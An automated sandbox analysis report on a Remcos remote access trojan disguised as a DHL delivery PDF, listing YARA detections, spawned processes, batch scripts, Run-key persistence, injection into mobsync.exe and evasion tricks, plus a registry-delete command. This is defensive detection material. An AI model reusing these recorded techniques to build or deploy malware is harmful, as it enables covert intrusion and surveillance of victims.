              Source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\Public\Libraries\ocnezqI.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00412598 ExitWindowsEx,LoadLibraryA,GetProcAddress,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042E02D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004330D1
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0043424F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042220F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0041A3F8
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042E02D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004330D1
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0043424F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042220F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0041A3F8
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004304DB
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044C56A
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004335CD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0043E6E0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044A725
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004378EC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004228AD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004339E5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004229F0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 0042EDF6 appears 64 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 00402064 appears 87 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 0042F460 appears 43 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 004165D8 appears 37 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 004020B5 appears 31 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 00404818 appears 31 times
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Iqzenco.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Iqzenco.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeVirustotal: Detection: 26%
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeReversingLabs: Detection: 24%
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
              Source: unknownProcess created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Iqzencolmjnhoxprppdkgkfyidrxfas[1]Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/10@49/2
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D1AD GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-8VTGWT
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040D41E FindResourceA,LoadResource,LockResource,SizeofResource,
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00458435 push esi; ret
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F4A6 push ecx; ret
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00450918 push eax; ret
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: .....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: .....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: .....
              Source: Iqzenco.exe.0.drStatic PE information: section name: .....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: .....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: ....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: .....
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
              Source: initial sampleStatic PE information: section where entry point is pointing to: ......
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeJump to dropped file
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IqzencoJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IqzencoJump to behavior

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon4828.png
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D455 Sleep,ExitProcess,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040D455 Sleep,ExitProcess,
              Source: C:\Windows\SysWOW64\mobsync.exe TID: 3628Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\mobsync.exe TID: 3880Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\secinit.exe TID: 2388Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\secinit.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00406176 FindFirstFileW,FindNextFileW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406176 FindFirstFileW,FindNextFileW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004456A9 FindFirstFileExA,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\secinit.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044697D GetProcessHeap,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0043B789 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F1CD SetUnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F1CD SetUnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F62C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2C60000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2C70000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2C80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D10000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D20000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D60000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D70000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D90000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3000000
